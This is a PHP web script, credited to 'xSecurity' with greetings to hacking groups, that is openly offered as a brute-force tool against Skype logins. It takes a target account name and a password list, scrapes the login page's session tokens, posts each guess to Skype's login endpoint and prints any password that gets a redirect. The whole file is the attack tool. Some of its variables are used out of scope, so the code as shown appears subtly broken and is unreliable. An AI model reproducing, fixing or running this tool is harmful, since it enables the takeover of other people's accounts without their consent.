Skype Brute Force PHP Version

1. <form method='POST'>
2. <title>Skype Brute Force 2013 By xSecurity</title>
3. <center>
4. <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br>
5. <input type='text' name='skypename' placeholder='Skype Name' size='38'><br>
6. <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br>
7. <input type='submit' value='Start Brute' name='brute'><br>
8. </center>
9. </form>
10. <?
11. @set_time_limit(0);
12. # Brute Force Skype PHP Version
13. # Coded By : xSecurity
14. # Greets To : (( Sec4ever.CoM )) - (( x3 Group )) - (( is-sec.CoM ))
15.  
16.  
17. $skype = "https://login.skype.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin";
18. # Username & Password
19. $username = $_POST['skypename'];
20. $password = explode("\r\n", $_POST['passwords']);
21.  
22. # time zone
23. $time = date_default_timezone_set("Asia/Riyadh");
24. $date = date('H:i:s'); //Returns IST
25.  
26. # header
27. $header = "HTTP/1.1 302";
28.  
29. # Fucntion Detalis
30. function xsecurity($skype)
31. {
32. $ch = curl_init();
33. curl_setopt($ch, CURLOPT_URL, $skype);
34. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
35. curl_setopt($ch, CURLOPT_HEADER, 1);
36. curl_setopt($ch, CURLOPT_POST, 1);
37. curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
38. curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
39. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
40. $run = curl_exec($ch);
41. preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash);
42. preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie);
43. preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm);
44. return $hash[1]."|:|".$piie[1]."|:|".$etmm[1];
45. }
46.  
47. # Explode Detalis
48. $xsec = explode("|:|" ,xsecurity($skype));
49. $token = $xsec[0];
50. $pie = $xsec[1];
51. $etm = $xsec[2];
52.  
53. # Function Brute
54. function brute($skype,$username,$pass,$header)
55. {
56. $ch = curl_init();
57. curl_setopt($ch, CURLOPT_URL, $skype);
58. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
59. curl_setopt($ch, CURLOPT_HEADER, 1);
60. curl_setopt($ch, CURLOPT_POST, 1);
61. curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin");
62. curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
63. curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
64. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
65. $brute = curl_exec($ch);
66. if(strstr($brute, $header))
67. {
68. echo "<font face='Tahoma' size='2'><center>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></font></center>";
69. }
70. return $brute;
71. }
72. if($_POST['brute'])
73. {
74. foreach($password as $pass)
75. {
76. brute($skype,$username,$pass,$header);
77. }
78. }
79. echo "<center><br><font face='Tahoma' size='5' color='red'>Coded By : xSecurity --> Sec4ever.CoM</font></center>";
80. ?>